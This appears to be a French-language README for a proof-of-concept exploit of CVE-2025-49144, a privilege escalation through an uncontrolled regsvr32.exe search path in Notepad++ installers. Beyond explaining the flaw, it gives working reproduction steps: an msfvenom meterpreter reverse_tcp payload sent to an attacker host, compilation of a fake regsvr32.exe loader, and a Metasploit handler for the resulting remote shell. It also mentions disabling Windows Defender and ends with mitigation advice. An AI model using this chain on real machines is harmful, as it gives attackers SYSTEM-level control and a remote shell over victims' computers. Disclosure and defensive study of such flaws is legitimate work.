
CVE-2025-49144 PoC pour les chercheurs en sécurité afin de tester et d'essayer.

📌 CVE-2025-49144 est une vulnérabilité d'élévation de privilèges locaux de haute sévérité trouvée dans les installateurs de Notepad++ v8.8.1 et versions antérieures. Cette vulnérabilité provient d'un comportement de recherche de chemin exécutable non contrôlé lors de l'installation, permettant à un attaquant local d'obtenir des privilèges de niveau SYSTEM en plaçant des exécutables malveillants dans le même répertoire que l'installateur.
⚙️ Comment fonctionne la CVE – Étape par étape :
🧱 1. Qu'est-ce qui a mal fonctionné dans l'installateur ?
L'installateur de Notepad++ (avant v8.8.2) appelle regsvr32.exe pour enregistrer certains composants — mais il le fait sans donner le chemin complet (comme C:\Windows\System32\regsvr32.exe).
Au lieu de cela, il exécute simplement :
regsvr32.exe some_dll
📂 2. Comportement du chemin de recherche de Windows :
Lorsqu'un exécutable est lancé sans chemin complet, Windows utilise un ordre de recherche spécifique pour trouver le fichier :
Le dossier à partir duquel l'application a été lancée (par exemple, Téléchargements)
Le dossier système (System32)
Le dossier Windows
Le répertoire de travail actuel
Les chemins dans la variable d'environnement PATH
Ainsi, si un faux regsvr32.exe est placé dans le même dossier que l'installateur (par exemple, Téléchargements), Windows l'utilisera avant le vrai.
💣 3. Exploitation :
- L'attaquant place un regsvr32.exe malveillant dans le même dossier que l'installateur légitime de Notepad++ (par exemple, le dossier Téléchargements de la victime).
- La victime exécute l'installateur (pensant qu'il est sûr).
- L'installateur appelle regsvr32.exe, mais finit par exécuter le malveillant à partir du même dossier — avec des privilèges SYSTEM (car les installateurs demandent généralement des permissions administrateur).
- La charge utile de l'attaquant s'exécute maintenant en tant que NT AUTHORITY\SYSTEM.
⚙️ Étapes pour reproduire :
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your-ip> LPORT=4444 -f c > shellcode.txt
x86_64-w64-mingw32-gcc regsvr32_loader.c -o regsvr32.exe -mwindows
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST X.X.X.X
set LPORT 4444
run
Note : Il s'agit d'une PoC donc testée avec Windows Defender et la protection en temps réel désactivées.
✅ Atténuation
Les utilisateurs et administrateurs devraient :
Mettez à jour vers Notepad++ v8.8.2 ou version ultérieure
Limitez l'installation de logiciels aux administrateurs de confiance
Utilisez AppLocker, WDAC ou des stratégies de restriction de logiciels (SRP) pour :
Les équipes de sécurité devraient auditer régulièrement les chemins d'installation, surveiller les permissions d'écriture et observer le comportement lors de l'exécution des installateurs pour réduire la surface d'attaque.
Licence MIT — Gratuit à des fins éducatives, de recherche et défensives uniquement.
Les pull requests sont les bienvenues — améliorer la détection, ajouter des fonctionnalités ou suggérer des correctifs.
Cette PoC est uniquement à des fins éducatives et de recherche. Utilisez-la à vos propres risques. L'auteur n'est pas responsable de toute mauvaise utilisation ou des dommages causés.